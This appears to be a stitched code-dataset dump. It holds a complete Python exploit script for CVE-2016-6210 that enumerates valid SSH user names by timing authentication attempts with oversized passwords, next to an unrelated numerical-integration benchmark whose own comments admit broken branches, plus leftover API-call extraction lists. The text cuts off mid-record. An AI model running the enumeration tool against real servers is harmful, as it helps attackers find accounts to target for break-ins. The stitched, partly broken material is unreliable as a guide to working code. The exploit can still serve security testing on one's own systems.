7918), 'os.path.splitext', 'os.path.splitext', (['ncfile'], {}), '(ncfile)\n', (7910, 7918), False, 'import os\n'), ((8033, 8060), 'netCDF4.Dataset', 'Dataset', (['(input_dir + ncfile)'], {}), '(input_dir + ncfile)\n', (8040, 8060), False, 'from netCDF4 import Dataset\n'), ((7938, 7988), 'datetime.datetime.strptime', 'datetime.strptime', (['ncfile_datestr', 'filename_format'], {}), '(ncfile_datestr, filename_format)\n', (7955, 7988), False, 'from datetime import datetime\n'), ((8125, 8199), 'modeldata.netcdf_to_quantity', 'netcdf_to_quantity', (['netcdf', 'variable'], {'new_name': 'variable', 'i_depths': 'i_depths'}), '(netcdf, variable, new_name=variable, i_depths=i_depths)\n', (8143, 8199), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((8263, 8337), 'modeldata.netcdf_to_quantity', 'netcdf_to_quantity', (['netcdf', 'variable'], {'new_name': 'variable', 'i_depths': 'i_depths'}), '(netcdf, variable, new_name=variable, i_depths=i_depths)\n', (8281, 8337), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((8377, 8440), 'numpy.concatenate', 'np.concatenate', (['(quantity.values, next_quantity.values)'], {'axis': '(0)'}), '((quantity.values, next_quantity.values), axis=0)\n', (8391, 8440), True, 'import numpy as np\n'), ((7646, 7670), 'datetime.datetime', 'datetime', (['(1900)', 'month', '(1)'], {}), '(1900, month, 1)\n', (7654, 7670), False, 'from datetime import datetime\n'), ((7669, 7689), 'datetime.datetime', 'datetime', (['(1900)', '(1)', '(1)'], {}), '(1900, 1, 1)\n', (7677, 7689), False, 'from datetime import datetime\n'), ((7521, 7545), 'datetime.datetime', 'datetime', (['(1900)', 'month', '(1)'], {}), '(1900, month, 1)\n', (7529, 7545), False, 'from datetime import datetime\n')]
#!/usr/bin/python # # CVEs: CVE-2016-6210 (Credits for this go to <NAME>) # # Author: 0_o -- null_null # nu11.nu11 [at] yahoo.com # Oh, and it is n-u-one-one.n-u-one-one, no l's... # Wonder how the guys at packet storm could get this wrong :( # # Date: 2016-07-19 # # Purpose: User name enumeration against SSH daemons affected by CVE-2016-6210. # # Prerequisites: Network access to the SSH daemon. # # DISCLAIMER: Use against your own hosts only! Attacking stuff you are not # permitted to may put you in big trouble! # # And now - the fun part :-) # import paramiko import time import numpy import argparse import sys args = None class bcolors: HEADER = '\033[95m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' def get_args(): parser = argparse.ArgumentParser() group = parser.add_mutually_exclusive_group() parser.add_argument("host", type = str, help = "Give SSH server address like ip:port or just by ip") group.add_argument("-u", "--user", type = str, help = "Give a single user name") group.add_argument("-U", "--userlist", type = str, help = "Give a file containing a list of users") parser.add_argument("-e", "--enumerated", action = "store_true", help = "Only show enumerated users") parser.add_argument("-s", "--silent", action = "store_true", help = "Like -e, but just the user names will be written to stdout (no banner, no anything)") parser.add_argument("--bytes", default = 50000, type = int, help = "Send so many BYTES to the SSH daemon as a password") parser.add_argument("--samples", default = 12, type = int, help = "Collect so many SAMPLES to calculate a timing baseline for authenticating non-existing users") parser.add_argument("--factor", default = 3.0, type = float, help = "Used to compute the upper timing boundary for user enumeration") parser.add_argument("--trials", default = 1, type = int, help = "try to authenticate user X for TRIALS times and compare the mean of auth timings against the timing boundary") args = parser.parse_args() return args def get_banner(host, port): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: ssh.connect(hostname = host, port = port, username = 'invalidinvalidinvalid', password = '<PASSWORD>') except: banner = ssh.get_transport().remote_version ssh.close() return banner def connect(host, port, user): global args starttime = 0.0 endtime = 0.0 p = 'B' * int(args.bytes) ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) starttime=time.clock() try: ssh.connect(hostname = host, port = port, username = user, password = p, look_for_keys = False, gss_auth = False, gss_kex = False, gss_deleg_creds = False, gss_host = None, allow_agent = False) except: endtime=time.clock() finally: ssh.close() return endtime - starttime def main(): global args args = get_args() if not args.silent: print("\n\nUser name enumeration against SSH daemons affected by CVE-2016-6210") if not args.silent: print("Created and coded by 0_o (nu11.nu11 [at] yahoo.com), PoC by <NAME>\n\n") if args.host: host = args.host.split(":")[0] try: port = int(args.host.split(":")[1]) except IndexError: port = 2222 users = [] if args.user: users.append(args.user) elif args.userlist: with open(args.userlist, "r") as f: users = f.readlines() else: if not args.silent: print(bcolors.FAIL + "[!] " + bcolors.ENDC + "You must give a user or a list of users") sys.exit() if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Testing SSHD at: " + bcolors.BOLD + str(host) + ":" + str(port) + bcolors.ENDC + ", Banner: " + bcolors.BOLD + get_banner(host, port) + bcolors.ENDC) # get baseline timing for non-existing users... baseline_samples = [] baseline_mean = 0.0 baseline_deviation = 0.0 if not args.silent: sys.stdout.write(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Getting baseline timing for authenticating non-existing users") for i in range(1, int(args.samples) + 1): if not args.silent: sys.stdout.write('.') if not args.silent: sys.stdout.flush() sample = connect(host, port, 'foobar-bleh-nonsense' + str(i)) baseline_samples.append(sample) if not args.silent: sys.stdout.write('\n') # remove the biggest and smallest value baseline_samples.sort() baseline_samples.pop() baseline_samples.reverse() baseline_samples.pop() # do math baseline_mean = numpy.mean(numpy.array(baseline_samples)) baseline_deviation = numpy.std(numpy.array(baseline_samples)) if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Baseline mean for host " + host + " is " + str(baseline_mean) + " seconds.") if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Baseline variation for host " + host + " is " + str(baseline_deviation) + " seconds.") upper = baseline_mean + float(args.factor) * baseline_deviation if not args.silent: print(bcolors.WARNING + "[*] " + bcolors.ENDC + "Defining timing of x < " + str(upper) + " as non-existing user.") if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Testing your users...") # # Get timing for the given user name... # for u in users: user = u.strip() enum_samples = [] enum_mean = 0.0 for t in range(0, int(args.trials)): timeval = connect(host, port, user) enum_samples.append(timeval) enum_mean = numpy.mean(numpy.array(enum_samples)) if (enum_mean < upper): if not (args.enumerated or args.silent) : print(bcolors.FAIL + "[-] " + bcolors.ENDC + user + " - timing: " + str(enum_mean)) else: if not args.silent: print(bcolors.OKGREEN + "[+] " + bcolors.ENDC + user + " - timing: " + str(enum_mean)) else: print(user) if __name__ == "__main__": main()
[ "sys.stdout.write", "paramiko.SSHClient", "argparse.ArgumentParser", "time.clock", "numpy.array", "sys.stdout.flush", "paramiko.AutoAddPolicy", "sys.exit" ]
[((1074, 1099), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (1097, 1099), False, 'import argparse\n'), ((2395, 2415), 'paramiko.SSHClient', 'paramiko.SSHClient', ([], {}), '()\n', (2413, 2415), False, 'import paramiko\n'), ((2814, 2834), 'paramiko.SSHClient', 'paramiko.SSHClient', ([], {}), '()\n', (2832, 2834), False, 'import paramiko\n'), ((2909, 2921), 'time.clock', 'time.clock', ([], {}), '()\n', (2919, 2921), False, 'import time\n'), ((2451, 2475), 'paramiko.AutoAddPolicy', 'paramiko.AutoAddPolicy', ([], {}), '()\n', (2473, 2475), False, 'import paramiko\n'), ((2870, 2894), 'paramiko.AutoAddPolicy', 'paramiko.AutoAddPolicy', ([], {}), '()\n', (2892, 2894), False, 'import paramiko\n'), ((4301, 4427), 'sys.stdout.write', 'sys.stdout.write', (["(bcolors.OKBLUE + '[*] ' + bcolors.ENDC +\n 'Getting baseline timing for authenticating non-existing users')"], {}), "(bcolors.OKBLUE + '[*] ' + bcolors.ENDC +\n 'Getting baseline timing for authenticating non-existing users')\n", (4317, 4427), False, 'import sys\n'), ((4687, 4709), 'sys.stdout.write', 'sys.stdout.write', (['"""\n"""'], {}), "('\\n')\n", (4703, 4709), False, 'import sys\n'), ((4905, 4934), 'numpy.array', 'numpy.array', (['baseline_samples'], {}), '(baseline_samples)\n', (4916, 4934), False, 'import numpy\n'), ((4970, 4999), 'numpy.array', 'numpy.array', (['baseline_samples'], {}), '(baseline_samples)\n', (4981, 4999), False, 'import numpy\n'), ((3153, 3165), 'time.clock', 'time.clock', ([], {}), '()\n', (3163, 3165), False, 'import time\n'), ((3918, 3928), 'sys.exit', 'sys.exit', ([], {}), '()\n', (3926, 3928), False, 'import sys\n'), ((4494, 4515), 'sys.stdout.write', 'sys.stdout.write', (['"""."""'], {}), "('.')\n", (4510, 4515), False, 'import sys\n'), ((4541, 4559), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (4557, 4559), False, 'import sys\n'), ((5895, 5920), 'numpy.array', 'numpy.array', (['enum_samples'], {}), '(enum_samples)\n', (5906, 5920), False, 'import numpy\n')]
import Rate_calculation #import constants as ct from mpmath import mp from mpmath import fp import numpy as np import scipy.integrate as spint import time methods=["mp-gl", "mp-ts", "fp-gl", "fp-ts", "sp-quad", "sp-gauss", "monte-carlo", "w-cumsum", "sp-simps", "romberg"]; #cumtrapz relative error tolerance err_rel=1e-1; def_nodes=1e2; #default number of nodes maxloop=100; # general integration method # syntax is mpmath like, set the limits you dont want to integrate over to 0 # def integrate(f, limx, limy, limz, method): if method=="mp-gl": if limz!=0: return mp.quad(f, limx, limy, limz, method="gauss-legendre"); else: if limy!=0: return mp.quad(f, limx, limy, method="gauss-legendre"); else: return mp.quad(f, limx, method="gauss-legendre"); elif method=="mp-ts": if limz!=0: return mp.quad(f, limx, limy, limz, method="tanh-sinh"); else: if limy!=0: return mp.quad(f, limx, limy, method="tanh-sinh"); else: return mp.quad(f, limx, method="tanh-sinh"); elif method=="fp-gl": if limz!=0: return fp.quad(f, limx, limy, limz, method="gauss-legendre"); else: if limy!=0: return fp.quad(f, limx, limy, method="gauss-legendre"); else: return fp.quad(f, limx, method="gauss-legendre"); elif method=="fp-ts": if limz!=0: return fp.quad(f, limx, limy, limz, method="tanh-sinh"); else: if limy!=0: return fp.quad(f, limx, limy, method="tanh-sinh"); else: return fp.quad(f, limx, method="tanh-sinh"); elif method=="sp-quad": if limz!=0: return spint.tplquad(f, limz[0], limz[1], limy[0], limy[1], limx[0], limx[1])[0]; else: if limy!=0: return spint.dblquad(f, limy[0], limy[1], limx[0], limx[1])[0]; else: return spint.quad(f, limx[0], limx[1])[0]; elif method=="romberg": if not np.ndim(limx)==0: limx=[float(limx[0]), float(limx[1])]; if not np.ndim(limy)==0: limy=[float(limy[0]), float(limy[1])]; if not np.ndim(limz)==0: limz=[float(limz[0]), float(limz[1])]; reltol=1e-16; abstol=1e-16; if limz!=0: return spint.romberg(lambda z: spint.romberg(lambda y: spint.romberg(lambda x: float(f(x,y,z)), limx[0], limx[1], tol=abstol, rtol=reltol), limy[0], limy[1], tol=abstol, rtol=reltol), limz[0], limz[1], tol=abstol, rtol=reltol); else: if limy!=0: return spint.romberg(lambda y: spint.romberg(lambda x: float(f(x,y)), limx[0], limy[1], tol=abstol, rtol=reltol), limy[0], limy[1], tol=abstol, rtol=reltol); else: return spint.romberg(lambda x: float(f(x)), limx[0], limx[1], tol=abstol, rtol=reltol); #currently broken, but slow so unused elif method=="sp-gauss": if not np.ndim(limx)==0: limx=[float(limx[0]), float(limx[1])]; if not np.ndim(limy)==0: limy=[float(limy[0]), float(limy[1])]; if not np.ndim(limz)==0: limz=[float(limz[0]), float(limz[1])]; order=7; if limz!=0: return spint.fixed_quad(lambda z: spint.fixed_quad(lambda y: spint.fixed_quad(lambda x: f(x,y,z), limx[0], limx[1], n=order)[0], limy[0], limy[1], n=order)[0], limz[0], limz[1], n=order)[0]; else: if limy!=0: return spint.fixed_quad(lambda y: spint.romberg(lambda x: f(x,y), limx[0], limy[1], n=order)[0], limy[0], limy[1], n=order)[0]; else: return spint.fixed_quad(lambda x: f(x), limx[0], limx[1], n=order)[0]; elif method=="w-cumsum": if not np.ndim(limx)==0: limx=[float(limx[0]), float(limx[1])]; if not np.ndim(limy)==0: limy=[float(limy[0]), float(limy[1])]; if not np.ndim(limz)==0: limz=[float(limz[0]), float(limz[1])]; if limz!=0: dx=(limx[1]-limx[0])/def_nodes; dy=(limy[1]-limy[0])/def_nodes; dz=(limz[1]-limz[0])/def_nodes; loop=0; lastres=0; while True: xl=np.arange(limx[0], limx[1], dx); yl=np.arange(limy[0], limy[1], dy); zl=np.arange(limz[0], limz[1], dz); X, Y, Z=np.meshgrid(xl, yl, zl); fx=[]; for i in range(0, len(X)): fy=[]; for j in range(0, len(Y)): fz=[]; for k in range(0, len(Z)): fz.append(f(X[i][j][k], Y[i][j][k], zl[k])); fy.append(spint.simps(fz, dx=dz)); fx.append(spint.simps(fy, dx=dy)); res=spint.simps(fx, dx=dx); if loop!=0: if np.abs(res-lastres)/res < err_rel: return res; else: ad=(1/2)**loop; #linear to begin with dx=dx*ad; dy=dy*ad; dz=dz*ad; lastres=res; if loop > maxloop: break; loop+=1; else: if limy!=0: dx=def_dx; dy=def_dx; loop=0; lastres=0; while True: xl=np.arange(limx[0], limx[1], dx); yl=np.arange(limy[0], limy[1], dy); X, Y=np.meshgrid(xl, yl); fx=[]; for i in range(0, len(X)): fy=[]; for j in range(0, len(Y)): fy.append(f(X[i][j], yl[j])); fx.append(spint.simps(fy, dx=dy)); res=spint.simps(fx, dx=dx); if loop!=0: if np.abs(res-lastres)/res < err_rel: return res; else: ad=(1/2)**loop; #linear to begin with dx=dx*ad; dy=dy*ad; lastres=res; if loop > maxloop: break; loop+=1; else: dx=def_dx; loop=0; lastres=0; while True: xl=np.arange(limx[0], limx[1], dx); fx=[]; for i in range(0, len(X)): fx.append(f(xl[i])); res=spint.simps(fx, dx=dx); if loop!=0: if np.abs(res-lastres)/res < err_rel: return res; else: ad=(1/2)**loop; #linear to begin with dx=dx*ad; lastres=res; if loop > maxloop: break; loop+=1; #still a bit broken but proved slower than mp-gl elif method=="monte-carlo": N=int(1e6); if limz!=0: N=int(round(N**(1/3))); x=np.random.rand(N)*(limx[1]-limx[0])+limx[0]; y=np.random.rand(N)*(limy[1]-limy[0])+limy[0]; z=np.random.rand(N)*(limz[1]-limy[0])+limz[0]; X,Y,Z=np.meshgrid(x,y,z); fxyz=[]; for i in range(0, len(X)): fxy=[]; for j in range(0, len(Y)): fx=[]; for k in range(0, len(Z)): fx.append(f(X[i][j][k], Y[i][j][k], Z[i][j][k])); fxy.append(fx); fxyz.append(fxy); wmax=np.max(fxyz); wmin=np.min(fxyz); W=np.random.rand(N, N, N)*(wmax-wmin)+wmin; est=0; for i in range(0, len(fxyz)): for j in range(0, len(fxyz[i])): for k in range(0, len(fxyz[i][j])): if W[i][j][k] > 0 and W[i][j][k] < fxyz[i][j][k]: est=est+fxyz[i][j][k]; elif W[i][j][k] < 0 and W[i][j][k] > fxyz[i][j][k]: est=est+fxyz[i][j][k]; return (est/(N**3))*(limx[1]-limx[0])*(limy[1]-limy[0])*(limz[1]-limz[0])*(wmax-wmin); else: if limy!=0: N=int(round(N**(1/2))); x=np.random.rand(N)*(limx[1]-limx[0])+limx[0]; y=np.random.rand(N)*(limy[1]-limy[0])+limy[0]; X,Y=np.meshgrid(x,y); fxy=[]; for i in range(0, len(X)): fx=[]; for j in range(0, len(Y)): fx.append(f(X[i][j], Y[i][j])); fxy.append(fx); zmax=np.max(fxy); zmin=np.min(fxy); Z=np.random.rand(N, N)*(zmax-zmin)+zmin; est=0; for i in range(0, len(fxy)): for j in range(0, len(fxy[i])): if Z[i][j] > 0 and Z[i][j] < fxy[i][j]: est=est+fxy[i][j]; elif Z[i][j] < 0 and Z[i][j] > fxy[i][j]: est=est+fxy[i][j]; return (est/(N**2))*(limx[1]-limx[0])*(limy[1]-limy[0])*(zmax-zmin); else: X=np.random.rand(N)*(limx[1]-limx[0])+limx[0]; fx=[]; for i in range(0, len(X)): fx.append(f(X[i])); ymax=np.max(fx); ymin=np.min(fx); Y=np.random.rand(N)*(ymax-ymin)+ymin; est=0; for i in range(0, len(fx)): if Y[i] > 0 and Y[i] < fx[i]: est=est+fx[i]; elif Y[i] < 0 and Y[i] > fx[i]: est=est+fx[i]; return (est/N)*(limx[1]-limx[0])*(ymax-ymin); #preallocated, expected to be slow elif method=="sp-simps": if limz!=0: dx=(limx[1]-limx[0])/def_nodes; dy=(limy[1]-limy[0])/def_nodes; dz=(limz[1]-limz[0])/def_nodes; loop=0; lastres=0; while True: xl=np.arange(limx[0], limx[1], dx); yl=np.arange(limy[0], limy[1], dy); zl=np.arange(limz[0], limz[1], dz); X, Y, Z=np.meshgrid(xl, yl, zl); fx=[]; for i in range(0, len(X)): fy=[]; for j in range(0, len(Y)): fz=[]; for k in range(0, len(Z)): fz.append(f(X[i][j][k], Y[i][j][k], zl[k])); fy.append(spint.simps(fz, dx=dz)); fx.append(spint.simps(fy, dx=dy)); res=spint.simps(fx, dx=dx); if loop!=0: if np.abs(res-lastres)/res < err_rel: return res; else: ad=(1/2)**loop; #linear to begin with dx=dx*ad; dy=dy*ad; dz=dz*ad; lastres=res; if loop > maxloop: break; loop+=1; else: if limy!=0: dx=def_dx; dy=def_dx; loop=0; lastres=0; while True: xl=np.arange(limx[0], limx[1], dx); yl=np.arange(limy[0], limy[1], dy); X, Y=np.meshgrid(xl, yl); fx=[]; for i in range(0, len(X)): fy=[]; for j in range(0, len(Y)): fy.append(f(X[i][j], yl[j])); fx.append(spint.simps(fy, dx=dy)); res=spint.simps(fx, dx=dx); if loop!=0: if np.abs(res-lastres)/res < err_rel: return res; else: ad=(1/2)**loop; #linear to begin with dx=dx*ad; dy=dy*ad; lastres=res; if loop > maxloop: break; loop+=1; else: dx=def_dx; loop=0; lastres=0; while True: xl=np.arange(limx[0], limx[1], dx); fx=[]; for i in range(0, len(X)): fx.append(f(xl[i])); res=spint.simps(fx, dx=dx); if loop!=0: if np.abs(res-lastres)/res < err_rel: return res; else: ad=(1/2)**loop; #linear to begin with dx=dx*ad; lastres=res; if loop > maxloop: break; loop+=1; return res; #benchmarking def benchmark(): f=lambda x,y,z: x**2*y**2-x**2*z; for m in methods: t=time.time(); r=integrate(f, [0, 1], 0, 0, m); print("Method: "+m+" Time: "+str(time.time()-t)+" Result: "+str(r)); if __name__=="__main__": benchmark();
[ "numpy.meshgrid", "numpy.abs", "mpmath.mp.quad", "scipy.integrate.quad", "mpmath.fp.quad", "numpy.ndim", "scipy.integrate.tplquad", "time.time", "numpy.max", "numpy.min", "numpy.arange", "scipy.integrate.dblquad", "numpy.random.rand", "scipy.integrate.simps" ]
[((14219, 14230), 'time.time', 'time.time', ([], {}), '()\n', (14228, 14230), False, 'import time\n'), ((595, 648), 'mpmath.mp.quad', 'mp.quad', (['f', 'limx', 'limy', 'limz'], {'method': '"""gauss-legendre"""'}), "(f, limx, limy, limz, method='gauss-legendre')\n", (602, 648), False, 'from mpmath import mp\n'), ((711, 758), 'mpmath.mp.quad', 'mp.quad', (['f', 'limx', 'limy'], {'method': '"""gauss-legendre"""'}), "(f, limx, limy, method='gauss-legendre')\n", (718, 758), False, 'from mpmath import mp\n'), ((801, 842), 'mpmath.mp.quad', 'mp.quad', (['f', 'limx'], {'method': '"""gauss-legendre"""'}), "(f, limx, method='gauss-legendre')\n", (808, 842), False, 'from mpmath import mp\n'), ((909, 957), 'mpmath.mp.quad', 'mp.quad', (['f', 'limx', 'limy', 'limz'], {'method': '"""tanh-sinh"""'}), "(f, limx, limy, limz, method='tanh-sinh')\n", (916, 957), False, 'from mpmath import mp\n'), ((1020, 1062), 'mpmath.mp.quad', 'mp.quad', (['f', 'limx', 'limy'], {'method': '"""tanh-sinh"""'}), "(f, limx, limy, method='tanh-sinh')\n", (1027, 1062), False, 'from mpmath import mp\n'), ((1105, 1141), 'mpmath.mp.quad', 'mp.quad', (['f', 'limx'], {'method': '"""tanh-sinh"""'}), "(f, limx, method='tanh-sinh')\n", (1112, 1141), False, 'from mpmath import mp\n'), ((1208, 1261), 'mpmath.fp.quad', 'fp.quad', (['f', 'limx', 'limy', 'limz'], {'method': '"""gauss-legendre"""'}), "(f, limx, limy, limz, method='gauss-legendre')\n", (1215, 1261), False, 'from mpmath import fp\n'), ((1324, 1371), 'mpmath.fp.quad', 'fp.quad', (['f', 'limx', 'limy'], {'method': '"""gauss-legendre"""'}), "(f, limx, limy, method='gauss-legendre')\n", (1331, 1371), False, 'from mpmath import fp\n'), ((1414, 1455), 'mpmath.fp.quad', 'fp.quad', (['f', 'limx'], {'method': '"""gauss-legendre"""'}), "(f, limx, method='gauss-legendre')\n", (1421, 1455), False, 'from mpmath import fp\n'), ((1522, 1570), 'mpmath.fp.quad', 'fp.quad', (['f', 'limx', 'limy', 'limz'], {'method': '"""tanh-sinh"""'}), "(f, limx, limy, limz, method='tanh-sinh')\n", (1529, 1570), False, 'from mpmath import fp\n'), ((1633, 1675), 'mpmath.fp.quad', 'fp.quad', (['f', 'limx', 'limy'], {'method': '"""tanh-sinh"""'}), "(f, limx, limy, method='tanh-sinh')\n", (1640, 1675), False, 'from mpmath import fp\n'), ((1718, 1754), 'mpmath.fp.quad', 'fp.quad', (['f', 'limx'], {'method': '"""tanh-sinh"""'}), "(f, limx, method='tanh-sinh')\n", (1725, 1754), False, 'from mpmath import fp\n'), ((1823, 1893), 'scipy.integrate.tplquad', 'spint.tplquad', (['f', 'limz[0]', 'limz[1]', 'limy[0]', 'limy[1]', 'limx[0]', 'limx[1]'], {}), '(f, limz[0], limz[1], limy[0], limy[1], limx[0], limx[1])\n', (1836, 1893), True, 'import scipy.integrate as spint\n'), ((14314, 14325), 'time.time', 'time.time', ([], {}), '()\n', (14323, 14325), False, 'import time\n'), ((1959, 2011), 'scipy.integrate.dblquad', 'spint.dblquad', (['f', 'limy[0]', 'limy[1]', 'limx[0]', 'limx[1]'], {}), '(f, limy[0], limy[1], limx[0], limx[1])\n', (1972, 2011), True, 'import scipy.integrate as spint\n'), ((2057, 2088), 'scipy.integrate.quad', 'spint.quad', (['f', 'limx[0]', 'limx[1]'], {}), '(f, limx[0], limx[1])\n', (2067, 2088), True, 'import scipy.integrate as spint\n'), ((2137, 2150), 'numpy.ndim', 'np.ndim', (['limx'], {}), '(limx)\n', (2144, 2150), True, 'import numpy as np\n'), ((2221, 2234), 'numpy.ndim', 'np.ndim', (['limy'], {}), '(limy)\n', (2228, 2234), True, 'import numpy as np\n'), ((2305, 2318), 'numpy.ndim', 'np.ndim', (['limz'], {}), '(limz)\n', (2312, 2318), True, 'import numpy as np\n'), ((3101, 3114), 'numpy.ndim', 'np.ndim', (['limx'], {}), '(limx)\n', (3108, 3114), True, 'import numpy as np\n'), ((3185, 3198), 'numpy.ndim', 'np.ndim', (['limy'], {}), '(limy)\n', (3192, 3198), True, 'import numpy as np\n'), ((3269, 3282), 'numpy.ndim', 'np.ndim', (['limz'], {}), '(limz)\n', (3276, 3282), True, 'import numpy as np\n'), ((3912, 3925), 'numpy.ndim', 'np.ndim', (['limx'], {}), '(limx)\n', (3919, 3925), True, 'import numpy as np\n'), ((3996, 4009), 'numpy.ndim', 'np.ndim', (['limy'], {}), '(limy)\n', (4003, 4009), True, 'import numpy as np\n'), ((4080, 4093), 'numpy.ndim', 'np.ndim', (['limz'], {}), '(limz)\n', (4087, 4093), True, 'import numpy as np\n'), ((4389, 4420), 'numpy.arange', 'np.arange', (['limx[0]', 'limx[1]', 'dx'], {}), '(limx[0], limx[1], dx)\n', (4398, 4420), True, 'import numpy as np\n'), ((4441, 4472), 'numpy.arange', 'np.arange', (['limy[0]', 'limy[1]', 'dy'], {}), '(limy[0], limy[1], dy)\n', (4450, 4472), True, 'import numpy as np\n'), ((4493, 4524), 'numpy.arange', 'np.arange', (['limz[0]', 'limz[1]', 'dz'], {}), '(limz[0], limz[1], dz)\n', (4502, 4524), True, 'import numpy as np\n'), ((4551, 4574), 'numpy.meshgrid', 'np.meshgrid', (['xl', 'yl', 'zl'], {}), '(xl, yl, zl)\n', (4562, 4574), True, 'import numpy as np\n'), ((5006, 5028), 'scipy.integrate.simps', 'spint.simps', (['fx'], {'dx': 'dx'}), '(fx, dx=dx)\n', (5017, 5028), True, 'import scipy.integrate as spint\n'), ((7934, 7954), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y', 'z'], {}), '(x, y, z)\n', (7945, 7954), True, 'import numpy as np\n'), ((8330, 8342), 'numpy.max', 'np.max', (['fxyz'], {}), '(fxyz)\n', (8336, 8342), True, 'import numpy as np\n'), ((8361, 8373), 'numpy.min', 'np.min', (['fxyz'], {}), '(fxyz)\n', (8367, 8373), True, 'import numpy as np\n'), ((9197, 9214), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {}), '(x, y)\n', (9208, 9214), True, 'import numpy as np\n'), ((9471, 9482), 'numpy.max', 'np.max', (['fxy'], {}), '(fxy)\n', (9477, 9482), True, 'import numpy as np\n'), ((9505, 9516), 'numpy.min', 'np.min', (['fxy'], {}), '(fxy)\n', (9511, 9516), True, 'import numpy as np\n'), ((10217, 10227), 'numpy.max', 'np.max', (['fx'], {}), '(fx)\n', (10223, 10227), True, 'import numpy as np\n'), ((10250, 10260), 'numpy.min', 'np.min', (['fx'], {}), '(fx)\n', (10256, 10260), True, 'import numpy as np\n'), ((4961, 4983), 'scipy.integrate.simps', 'spint.simps', (['fy'], {'dx': 'dy'}), '(fy, dx=dy)\n', (4972, 4983), True, 'import scipy.integrate as spint\n'), ((5693, 5724), 'numpy.arange', 'np.arange', (['limx[0]', 'limx[1]', 'dx'], {}), '(limx[0], limx[1], dx)\n', (5702, 5724), True, 'import numpy as np\n'), ((5753, 5784), 'numpy.arange', 'np.arange', (['limy[0]', 'limy[1]', 'dy'], {}), '(limy[0], limy[1], dy)\n', (5762, 5784), True, 'import numpy as np\n'), ((5836, 5855), 'numpy.meshgrid', 'np.meshgrid', (['xl', 'yl'], {}), '(xl, yl)\n', (5847, 5855), True, 'import numpy as np\n'), ((6183, 6205), 'scipy.integrate.simps', 'spint.simps', (['fx'], {'dx': 'dx'}), '(fx, dx=dx)\n', (6194, 6205), True, 'import scipy.integrate as spint\n'), ((6869, 6900), 'numpy.arange', 'np.arange', (['limx[0]', 'limx[1]', 'dx'], {}), '(limx[0], limx[1], dx)\n', (6878, 6900), True, 'import numpy as np\n'), ((7087, 7109), 'scipy.integrate.simps', 'spint.simps', (['fx'], {'dx': 'dx'}), '(fx, dx=dx)\n', (7098, 7109), True, 'import scipy.integrate as spint\n'), ((7752, 7769), 'numpy.random.rand', 'np.random.rand', (['N'], {}), '(N)\n', (7766, 7769), True, 'import numpy as np\n'), ((7811, 7828), 'numpy.random.rand', 'np.random.rand', (['N'], {}), '(N)\n', (7825, 7828), True, 'import numpy as np\n'), ((7870, 7887), 'numpy.random.rand', 'np.random.rand', (['N'], {}), '(N)\n', (7884, 7887), True, 'import numpy as np\n'), ((8390, 8413), 'numpy.random.rand', 'np.random.rand', (['N', 'N', 'N'], {}), '(N, N, N)\n', (8404, 8413), True, 'import numpy as np\n'), ((10937, 10968), 'numpy.arange', 'np.arange', (['limx[0]', 'limx[1]', 'dx'], {}), '(limx[0], limx[1], dx)\n', (10946, 10968), True, 'import numpy as np\n'), ((10989, 11020), 'numpy.arange', 'np.arange', (['limy[0]', 'limy[1]', 'dy'], {}), '(limy[0], limy[1], dy)\n', (10998, 11020), True, 'import numpy as np\n'), ((11041, 11072), 'numpy.arange', 'np.arange', (['limz[0]', 'limz[1]', 'dz'], {}), '(limz[0], limz[1], dz)\n', (11050, 11072), True, 'import numpy as np\n'), ((11099, 11122), 'numpy.meshgrid', 'np.meshgrid', (['xl', 'yl', 'zl'], {}), '(xl, yl, zl)\n', (11110, 11122), True, 'import numpy as np\n'), ((11554, 11576), 'scipy.integrate.simps', 'spint.simps', (['fx'], {'dx': 'dx'}), '(fx, dx=dx)\n', (11565, 11576), True, 'import scipy.integrate as spint\n'), ((4906, 4928), 'scipy.integrate.simps', 'spint.simps', (['fz'], {'dx': 'dz'}), '(fz, dx=dz)\n', (4917, 4928), True, 'import scipy.integrate as spint\n'), ((5081, 5102), 'numpy.abs', 'np.abs', (['(res - lastres)'], {}), '(res - lastres)\n', (5087, 5102), True, 'import numpy as np\n'), ((9052, 9069), 'numpy.random.rand', 'np.random.rand', (['N'], {}), '(N)\n', (9066, 9069), True, 'import numpy as np\n'), ((9115, 9132), 'numpy.random.rand', 'np.random.rand', (['N'], {}), '(N)\n', (9129, 9132), True, 'import numpy as np\n'), ((9537, 9557), 'numpy.random.rand', 'np.random.rand', (['N', 'N'], {}), '(N, N)\n', (9551, 9557), True, 'import numpy as np\n'), ((10043, 10060), 'numpy.random.rand', 'np.random.rand', (['N'], {}), '(N)\n', (10057, 10060), True, 'import numpy as np\n'), ((10281, 10298), 'numpy.random.rand', 'np.random.rand', (['N'], {}), '(N)\n', (10295, 10298), True, 'import numpy as np\n'), ((6130, 6152), 'scipy.integrate.simps', 'spint.simps', (['fy'], {'dx': 'dy'}), '(fy, dx=dy)\n', (6141, 6152), True, 'import scipy.integrate as spint\n'), ((11509, 11531), 'scipy.integrate.simps', 'spint.simps', (['fy'], {'dx': 'dy'}), '(fy, dx=dy)\n', (11520, 11531), True, 'import scipy.integrate as spint\n'), ((12241, 12272), 'numpy.arange', 'np.arange', (['limx[0]', 'limx[1]', 'dx'], {}), '(limx[0], limx[1], dx)\n', (12250, 12272), True, 'import numpy as np\n'), ((12301, 12332), 'numpy.arange', 'np.arange', (['limy[0]', 'limy[1]', 'dy'], {}), '(limy[0], limy[1], dy)\n', (12310, 12332), True, 'import numpy as np\n'), ((12384, 12403), 